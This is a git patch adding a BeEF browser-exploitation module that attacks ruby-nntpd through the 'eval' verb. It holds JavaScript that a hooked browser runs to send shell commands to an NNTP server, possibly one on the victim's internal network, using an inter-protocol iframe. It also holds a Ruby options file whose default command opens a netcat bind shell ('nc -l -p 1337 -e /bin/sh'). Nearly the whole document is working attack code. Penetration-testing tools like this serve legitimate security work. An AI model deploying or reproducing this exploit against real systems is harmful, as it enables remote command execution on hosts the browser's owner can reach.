From 717f63ff0cc974e1f1a73463dd77ef1eac387fc5 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 24 May 2013 13:50:04 +0930
Subject: [PATCH] Add ruby-nntpd Command Execution exploit module

---
 .../exploits/ruby_nntpd_cmd_exec/command.js   | 43 +++++++++++++++++++
 .../exploits/ruby_nntpd_cmd_exec/config.yaml  | 16 +++++++
 .../exploits/ruby_nntpd_cmd_exec/module.rb    | 24 +++++++++++
 3 files changed, 83 insertions(+)
 create mode 100644 modules/exploits/ruby_nntpd_cmd_exec/command.js
 create mode 100644 modules/exploits/ruby_nntpd_cmd_exec/config.yaml
 create mode 100644 modules/exploits/ruby_nntpd_cmd_exec/module.rb

diff --git a/modules/exploits/ruby_nntpd_cmd_exec/command.js b/modules/exploits/ruby_nntpd_cmd_exec/command.js
new file mode 100644
index 000000000..8ac6f5de6
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\neval `'+cmd+'`\r\nexit\r\n';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var nntpd_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(nntpd_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/config.yaml b/modules/exploits/ruby_nntpd_cmd_exec/config.yaml
new file mode 100644
index 000000000..09abcc5d0
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        ruby_nntpd_cmd_exec:
+            enable: true
+            category: "Exploits"
+            name: "ruby-nntpd Command Execution"
+            description: "This module uses the 'eval' verb in ruby-nntpd 0.01dev (default port 1119) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/module.rb b/modules/exploits/ruby_nntpd_cmd_exec/module.rb
new file mode 100644
index 000000000..660076af3
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# ruby-nntpd homepage: http://code.google.com/p/ruby-nntpd/
+###
+class Ruby_nntpd_cmd_exec < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '1119'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'nc -l -p 1337 -e /bin/sh', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end